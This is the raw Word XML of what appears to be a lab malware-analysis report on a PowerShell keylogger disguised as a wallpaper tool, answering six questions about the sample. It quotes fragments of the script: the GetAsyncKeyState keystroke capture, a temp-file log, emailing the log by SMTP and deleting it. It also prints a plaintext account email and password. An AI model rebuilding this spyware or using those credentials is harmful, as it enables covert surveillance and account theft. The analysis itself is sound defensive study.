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D64D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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F21AA" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:t>During a defensive review of the PowerShell script found in the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Script Analysis” folder (HDWallpaperEngine.txt), the script was confirmed malicious: it implements a basic keylogger that writes keystrokes to a file, sends the file via SMTP as an attachment, then deletes the file. The script imports user32.dll and uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> to capture keystrokes. Analysis of the script text (no execution) produced the SHA256, credentials, SMTP port, DLL used for keystroke capture, and the output file location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B45F6" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:pict w14:anchorId="273877EF">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97A19F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Results / Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67200D87" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Analysis performed on a VM by reading the script file at:</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>/home/kali/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Script Analysis/HDWallpaperEngine.txt (file read-only; file not executed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B3D9CB" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands run (read-only):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B73436" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>sha256sum "/home/kali/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Script Analysis/HDWallpaperEngine.txt" → produced the SHA256 hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AD1EF" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>grep patterns to locate emails, credential construction, SMTP usage, DLL/keystroke definitions, and file-write locations. (All greps were read-only text searches.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734A141" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immediate artifacts extracted from the script (evidence lines):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B15E0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$From (email): </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>4:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>From = "chaudhariparth454@gmail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F23155B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$Pass (password): </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>5:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>Pass = "yjghfdafsd5464562!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF71BDF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SMTP server: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>9:$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>SMTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> = "smtp.mail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F535B7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SMTP port: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>10:$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>SMTPPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> = "587"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1AA97C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DLL / keylogger API: lines showing user32.dll and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve">, e.g. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>22:[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>DllImport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve">"user32.dll", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>CharSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>CharSet.Auto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>ExactSpelling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>=true)] and 53: $state = $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>API::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>($ascii)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E4EB91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t xml:space="preserve">Output path (function default): </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>18:function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Start-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>KeyLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>($Path="$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>env:temp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>\keylogger.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>") and file creation/appending lines: 36: $null = New-Item -Path $Path -ItemType File -Force and 75: [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>System.IO.File</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>AppendAllText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>$Path, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>mychar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>Unicode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DD444" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:lastRenderedPageBreak/>
        <w:t>Send and cleanup: 82: send-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>mailmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> ... -Attachment $Path -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>smtpServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>smtpServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> -port $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>SMTPPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> -credential $credentials -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>usessl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> and 83: Remove-Item -Path $Path -force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0635368F" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:pict w14:anchorId="3C5DD089">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="427AB72F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Analysis Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2587E" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Computed SHA256 from the raw file with sha256sum to fingerprint the sample.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899D27C" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extraction:</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Searched for common indicators of SMTP usage, credential handling, Add-Type usage, keystroke APIs, and file I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002CAA81" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interpretation:</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Mapped variable assignments and function defaults to final runtime artifacts (i.e., $Path default resolves to the Windows temporary folder via $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>env:temp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95C6F8" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Verified the script uses Add-Type to declare native signatures for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> and calls that API to capture keystrokes, writes them in Unicode to the path, emails the file, then deletes it — classical keylogger behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEE31A" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:pict w14:anchorId="7615E0E6">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B177D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Findings (direct answers to the six questions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0F559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t>What is the SHA256 hash value for this script?</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>e0b7a2ad2320ac32c262aeb6fe2c6c0d75449c6e34d0d18a531157c827b9754e</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Computed from /home/kali/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Script Analysis/HDWallpaperEngine.txt.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F11021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t>What email was used to send and receive emails?</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>chaudhariparth454@gmail.com</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Found in script line: $From = "chaudhariparth454@gmail.com".)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22048FB1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t>What is the password for this account?</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>yjghfdafsd5464562!</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Found in script line: $Pass = "yjghfdafsd5464562!".)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24093AA4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t>What port is the script using for SMTP?</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>587</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Found in script line: $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SMTPPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = "587". The Send-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MailMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> call uses -port $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SMTPPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111B680B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lastRenderedPageBreak/>
        <w:t>What DLL is imported to help record user keystrokes?</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>user32.dll (via Add-Type and [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>DllImport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>"user32.dll", ...)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>]) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> script calls </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Evidence: lines referencing [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DllImport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"user32.dll", ...)] and $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>API::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637325E4" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What folder is the generated text file put in?</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
        <w:t>The script writes the keylogger output to the Windows temporary folder, using the default path: $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>env:temp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>\keylogger.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>. In Windows terms this resolves to the current user’s %TEMP% directory (e.g., C:\Users\&lt;username&gt;\AppData\Local\Temp\keylogger.txt) at runtime.</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Evidence: function definition Start-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>KeyLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>($Path="$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>env:temp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\keylogger.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">"), New-Item -Path $Path -ItemType File -Force, and subsequent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AppendAllText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>$Path, ...).)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538188FF" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:pict w14:anchorId="4061BC2F">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71916E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Observations &amp; Learnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4E6ED" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve">The script is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>self-contained keylogger</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve">: it declares unmanaged signatures for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>, polls keystrokes, appends keystrokes to a Unicode text file, emails that file to the specified SMTP server using the hard-coded credentials, and then deletes the file to cover its tracks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BF440" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>Use of -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>usessl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> with port 587 suggests a submission/STARTTLS SMTP flow (common for authenticated SMTP submission).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24563982" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>Credentials are stored in plaintext in the script — immediate risk for credential theft if the script is found on disk.</w:t>
      </w:r>
    </w:p>
